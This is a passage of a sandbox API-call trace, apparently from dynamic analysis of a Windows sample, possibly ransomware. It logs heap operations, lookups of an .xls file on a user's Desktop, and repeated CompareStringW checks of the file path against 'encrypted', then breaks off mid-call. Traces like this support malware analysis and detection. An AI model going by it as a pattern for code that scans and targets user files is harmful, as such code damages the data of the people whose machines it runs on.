[0031.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.417] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0031.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0031.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0031.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0031.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.417] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f62b900, ftCreationTime.dwHighDateTime=0x1d5c31a, ftLastAccessTime.dwLowDateTime=0x5360f1c0, ftLastAccessTime.dwHighDateTime=0x1d5c17e, ftLastWriteTime.dwLowDateTime=0x5360f1c0, ftLastWriteTime.dwHighDateTime=0x1d5c17e, nFileSizeHigh=0x0, nFileSizeLow=0xf4c4, dwReserved0=0x0, dwReserved1=0x777648, cFileName="R99f_hoG0iVXG.xls", cAlternateFileName="R99F_H~1.XLS")) returned 0x7c20c0 [0031.417] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0031.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0031.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0031.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0031.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0031.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0031.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.418] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0031.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0031.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0031.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0031.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.418] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f62b900, ftCreationTime.dwHighDateTime=0x1d5c31a, ftLastAccessTime.dwLowDateTime=0x5360f1c0, ftLastAccessTime.dwHighDateTime=0x1d5c17e, ftLastWriteTime.dwLowDateTime=0x5360f1c0, ftLastWriteTime.dwHighDateTime=0x1d5c17e, nFileSizeHigh=0x0, nFileSizeLow=0xf4c4, dwReserved0=0x0, dwReserved1=0x777648, cFileName="R99f_hoG0iVXG.xls", cAlternateFileName="R99F_H~1.XLS")) returned 0x7c20c0 [0031.418] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0031.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0031.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0031.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0031.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0031.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0031.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.419] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0031.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0031.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0031.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0031.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0031.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0031.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="33uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jNI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NI\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lK15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="15Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vz5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="99f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 